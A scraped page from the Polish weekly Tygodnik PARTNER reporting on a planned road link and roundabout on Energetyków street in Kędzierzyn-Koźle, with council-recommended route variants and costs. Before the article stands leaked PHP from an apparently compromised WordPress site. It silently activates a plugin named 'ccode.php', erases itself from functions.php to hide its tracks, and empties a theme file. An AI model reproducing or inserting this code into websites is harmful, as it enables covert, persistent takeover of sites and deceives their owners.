function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Na ulicy Energetyków prawdopodobnie powstanie rondo | Tygodnik PARTNER

Na ulicy Energetyków prawdopodobnie powstanie rondo

Miasto pracuje nad budową łącznika z północną obwodnicą.

Ciężki transport opuści osiedla Urząd Miasta Kędzierzyn-Koźle

Ciężki transport opuści osiedla Urząd Miasta Kędzierzyn-Koźle

Północna obwodnica miasta ma wyprowadzić ruch samochodów ciężarowych poza największe kędzierzyńskie osiedla. Wszystko po to, aby zminimalizować ryzyko zaistnienia katastrofy w ruchu lądowym związanej z transportem chemikaliów z tutejszych zakładów.

Ostatnia nitka miejskiej obwodnicy prowadzić będzie od osiedla Piastów przez Lenartowice, Cisową, Sławięcice do autostrady A4. Kompleks przemysłowy w Blachowni ma być z nią skomunikowany za pomocą tzw. łącznika. Miasto pracuje nad jego budową. Jest w trakcie wykonywania dokumentacji łącznika terenów przemysłowych w Blachowni z planowaną obwodnicą północną Kędzierzyna-Koźla. Na ostatnim posiedzeniu komisji infrastruktury radni zarekomendowali realizację wariantów 2, 3 lub 4, zaprezentowanych na mapie. Wszystkie trzy, o długości 2,5-2,7 km, rozpoczynają się rondem na wylocie ul. Energetyków i biegną na wschód od Miejsca Kłodnickiego na granicy lasu.

Na posiedzeniu komisji byli obecni przedstawiciele rad osiedli Miejsce Kłodnickie i Przyjaźni oraz firmy wykonującej dokumentację. n- Ze względów społecznych i logistycznych chcielibyśmy, żeby łącznik był jak najdalej odsunięty od obu osiedli – zaznaczał zastępca prezydenta Artur Maruszczak.

Zarekomendowane warianty wymagają budowy mostów nad Kanałem Gliwickim i Kłodnicą. Ich koszty są wstępnie szacowane na sporo ponad 50 milionów złotych netto. Odrzucony wariant nr 1 był tańszy o jedną trzecią – w tej wersji nie trzeba byłoby budować nowego mostu na Kanale Gliwickim – ale przebiegał najbliżej zabudowań. Projektanci zaplanowali na wszystkich zaakceptowanych trasach ronda na ul. Przyjaźni/Strzeleckiej, Szpaków i na połączeniu z obwodnicą północną.

Ostateczny przebieg łącznika będzie znany po koniecznych uzgodnieniach i opracowaniu finalnej dokumentacji projektowej. Nastąpi to do lutego 2021 roku. Wtedy miasto wyłoni wykonawcę, który wykona łącznik do czasu oddania do użytku obwodnicy północnej przez Generalną Dyrekcję Dróg Krajowych i Autostrad w 2022 roku. Radni przegłosowali też wniosek Ewy Czubek, żeby na planowanej trasie w możliwie największym stopniu zachować walory przyrodnicze doliny Kłodnicy i Kanału Gliwickiego.

Aktualna kategoria: AKTUALNOŚCI
REKLAMA
© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.